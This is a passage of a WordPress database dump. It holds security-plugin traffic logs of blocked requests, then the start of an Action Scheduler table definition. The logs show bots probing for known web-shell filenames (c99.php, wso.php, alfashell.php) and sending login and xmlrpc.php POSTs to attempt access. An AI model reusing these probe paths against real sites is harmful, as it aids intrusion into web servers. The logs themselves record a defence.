Safari\\/537.36\"}','MdcZBSADuqsUN8Cg9oVlpYXf',0,1681920429.1097,277,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','qhjbulGKfQUgZaAX7O5kJrdR',0,1681920430.6306,301,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','dF1PmHWoYkstARfI5zCi2q8J',0,1681920431.9820,328,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','C1kfDAHyncFWBwQ8epqbuvzX',0,1681920433.9398,316,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','nUhm3b1eSC8aqO4PxTWZQiRA',0,1681920435.2963,431,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-file.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','azU7fvJSYObkT49VGj2Xuins',0,1681920436.9184,309,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','St8k2yrJ9amBQYF71LXNTsvo',0,1681920438.1993,381,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/Alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Huji3VR2NnKBChI9y1vUoEAP',0,1681920439.6008,357,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','YxNIy6mq8TeBWfDEgK2HpvsM',0,1681920441.0204,336,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','OEgpYhwA6GqZQSF1jfsHkNxU',0,1681920442.5794,337,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','L9tJrsZYqS30hj1MzEvpUcIQ',0,1681920443.8502,344,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','BGzmEJZ9re5C0HoqnNkhO26w',0,1681920445.5609,320,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','179BvmiNsV3lQhA8MGIOPgat',0,1681920447.1673,370,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','jeFL6xmODv8a7rlQ9uNzT24R',0,1681920448.5756,333,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','rnBizGU8qWXZawgdhFe4A6lP',0,1681920449.9879,346,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','PHo3QgLvGiKUpJd9AOV2E7sk',0,1681920451.5805,352,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','FUM3hfuRkzXQsnLe6PqNAKZx',0,1681920452.9136,310,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','C2OAv5UyJ7grDQ1wnNdbluP4',0,1681920454.3301,331,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','fUYKm6pvkIlVMBG20LwErXZW',0,1681920455.7825,318,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-admin/css/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','YcesrwmNzkp9y1gZB3jOTQx4',0,1681920457.2709,308,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','dcpNJPOVv5RGobW9jAB0U63F',0,1681920458.7537,331,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','MwbgGTSOdiVWqNhB7c12Xnl8',0,1681920460.0336,320,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','8f4Vj2ryl1NbpCsZeg95cQv7',0,1681920461.3550,384,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ZhUqQ2RclPYkL4TOxXEBb5NA',0,1681920462.9586,343,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','sBWOKLu9Hhfm5UPbEeZ4QXGy',0,1681920464.2799,370,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Ttm95usYlMVIeBc6J0Q2HAfb',0,1681920466.0984,321,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ekuqVWGUfID1BcvAimJLobzt',0,1681920467.5408,315,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/w3llstore.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ayl1eLNVSEprBftzJ8qAgsDd',0,1681920469.1505,391,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/images/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','2Ji3OChQTtvnWxL4eGVUPuwq',0,1681920470.7272,281,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','EmAC2UQ6HG9Tdv53alXi8yuj',0,1681920472.1743,329,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','rM4dpZlqDXyOnQcLvP2wetWB',0,1681920473.5560,321,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','QcIYD48qAFHzwpLVxfro7Z3n',0,1681920475.0880,366,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0xcOWBAHKMTLQGdrs8Z1pkUD',0,1681920477.0876,346,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','CvzqkbayPloiQjJ179VEfhRw',0,1681920482.1270,420,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/public/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','6fCGByIX7tnK8JTDehUWumkV',0,1681920483.6307,398,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Qzo7Tbj12ehUD9GuOtq0xlsX',0,1681920485.1194,395,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','wYEDs2tWg6jQx1TXBFqRCeay',0,1681920486.5934,677,'','GET',403,0,700,0,1,'',0),('45.61.188.154',759020698,'','https://cmdev-site1.com/wp-login.php?redirect_to=https://cmdev-site1.com/wp-admin/','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko\\/20100101 Firefox\\/75.0\"}','Wgi3dUMujhbI984EKwyYCkA2',0,1681920486.9468,1733,'','POST',403,0,600,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','bZcqtKP102IJLwx35QljrHTS',0,1681920488.3893,503,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ACxUQp8569aHSvRghiKonsDt',0,1681920489.9777,303,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','e8AHSm1Kf3snDpzGca0JCE7W',0,1681920491.3668,296,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','cfO05vkZ6dUNpsYRMCJGEagD',0,1681920492.8758,336,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','FRQbX6w2sPk147oCOUrYJ0Vj',0,1681920494.2087,312,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','YSKLT9ytmVksGgOQvNpWz3bi',0,1681920495.8477,306,'','GET',403,0,700,0,1,'',0),('45.61.188.154',759020698,'','https://cmdev-site1.com/wp-login.php?redirect_to=https://cmdev-site1.com/wp-admin/','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko\\/20100101 Firefox\\/75.0\"}','uihJptw0mF1vB2kAzEaXI8Lx',0,1681920500.8496,549,'','POST',403,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\"}','RxHmC9BTQYAdzXt5leWE3ciN',0,1681920802.2940,404,'','GET',404,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php?bypass_wpem=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','Wqmf7KztOgsMFPxJaZ3YhAHj',0,1681920804.0600,422,'','GET',404,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\"}','SYiFqB3eI7CnGsxDEX1zoA2L',0,1681920896.1243,414,'','GET',404,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php?bypass_wpem=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','6FqX4A0VKSa8x2efuwJPrsGO',0,1681920897.8174,385,'','GET',404,0,600,0,1,'',0),('205.185.124.254',3451485438,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','s41GQDR0VwZTnzkXPguNpMAK',0,1681921485.0343,586,'','POST',403,0,600,0,1,'',0),('205.185.124.254',3451485438,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','PNnutd6RTs9hSyqlmrvcw35z',0,1681921501.0038,593,'','POST',403,0,600,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3Akp6ivJtaugnKPQIehTHwLS',0,1681921611.6516,2969,'','POST',403,0,515,0,1,'',0),('209.141.61.84',3515694420,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','NCV69wzh2EqDjpLRM0YOWel7',0,1681921771.3383,884,'','POST',403,0,515,0,1,'',0),('209.141.61.84',3515694420,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','IA7ZQNEdsYckX0JlMg1xzUD8',0,1681921777.4584,653,'','POST',403,0,515,0,1,'',0),('209.141.49.234',3515691498,'','https://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','CBJNX3s1cFonlVIfR8mAk4Wy',0,1681922270.2867,714,'','POST',403,0,600,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','3ERf1CpzoqdYrkgNFPI8M72w',0,1681922695.6814,3862,'','POST',403,0,515,0,1,'',0),('194.195.112.30',3267588126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','b4JQhSu8CR6pyOgPaefnBcNv',0,1681922698.4511,2315,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','6aeuZ0RHAjPS8tWVUsv9FiTk',0,1681922698.9405,2010,'','POST',403,0,515,0,1,'',0),('148.66.147.2',2487390978,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','OZLkgI5TH7Fu0hYCw1zWPpNm',0,1681922707.4577,1330,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','e0NZt7KfpXaxdTFUAJE5ycuR',0,1681922708.6708,883,'','POST',403,0,515,0,1,'',0),('72.167.125.153',1218936217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','f2rP4EyWJ8wMjl0YBADnCvOX',0,1681922709.8993,618,'','POST',403,0,515,0,1,'',0),('161.97.120.186',2707519674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','j7GTpnsJhaImNOWFQdqb5VRk',0,1681922718.6710,1313,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','jFvd94KxslTeyoru1knaQ8Oz',0,1681922718.8505,1289,'','POST',403,0,515,0,1,'',0),('107.190.132.194',1807647938,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','0uqdGvZfLI6zSOl2cJU7bR3m',0,1681922722.4941,1193,'','POST',403,0,515,0,1,'',0),('62.109.150.204',1047369420,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','4Hlx6s2uK0Tp8nNtzaYFkgyP',0,1681922722.9417,1030,'','POST',403,0,515,0,1,'',0),('185.2.5.90',3103917402,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','hBFcUv04fnqCSWEH6lPZj1w3',0,1681922726.1594,595,'','POST',403,0,515,0,1,'',0),('74.50.80.101',1244811365,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','DC3cuS1Bv6leQpM8hjiz0dPw',0,1681922732.6041,546,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','DVO0oRebdI3f9KlQuamtEBYy',0,1681922775.6862,2928,'','POST',403,0,515,0,1,'',0),('45.61.188.109',759020653,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','PhDOkm0E4uglbYyICZMi6vWp',0,1681922819.1280,582,'','POST',403,0,600,0,1,'',0),('45.61.188.109',759020653,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','dQvThMF8i4bS13BZLcRjsEJX',0,1681922852.5307,2047,'','POST',403,0,600,0,1,'',0),('216.250.113.143',3640291727,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','h5zHY4qRxc7BLEUIwWnMkAXS',0,1681924389.0008,661,'','POST',403,0,515,0,1,'',0),('162.240.222.168',2733694632,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','0gqSGnJRasmhMC5Bu4rXb9et',0,1681924391.2781,645,'','POST',403,0,515,0,1,'',0),('185.253.215.16',3120420624,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','iErxqm8TeaAjo4PMyubwJ0pZ',0,1681924398.2723,1289,'','POST',403,0,515,0,1,'',0),('123.30.238.182',2065624758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','eMyrtHWxgv4dsBwQPE3oCm1Y',0,1681924403.3028,676,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','fSMYreIp5cQVzvJiwCWN3Ll8',0,1681924404.0813,588,'','POST',403,0,515,0,1,'',0),('52.35.72.129',874727553,'','http://cmdev-site1.com/info.php','','{\"1\":\"Go-http-client\\/1.1\"}','7cPopS2GXUNbHTzeftkEZWdB',0,1681924765.4753,356,'','GET',403,0,700,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wpfi_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) NOT NULL,
  `status` varchar(20) NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) DEFAULT NULL,
  `schedule` longtext DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=525 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_actionscheduler_actions`
--

LOCK TABLES `wpfi_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wpfi_actionscheduler_actions` DISABLE KEYS */;
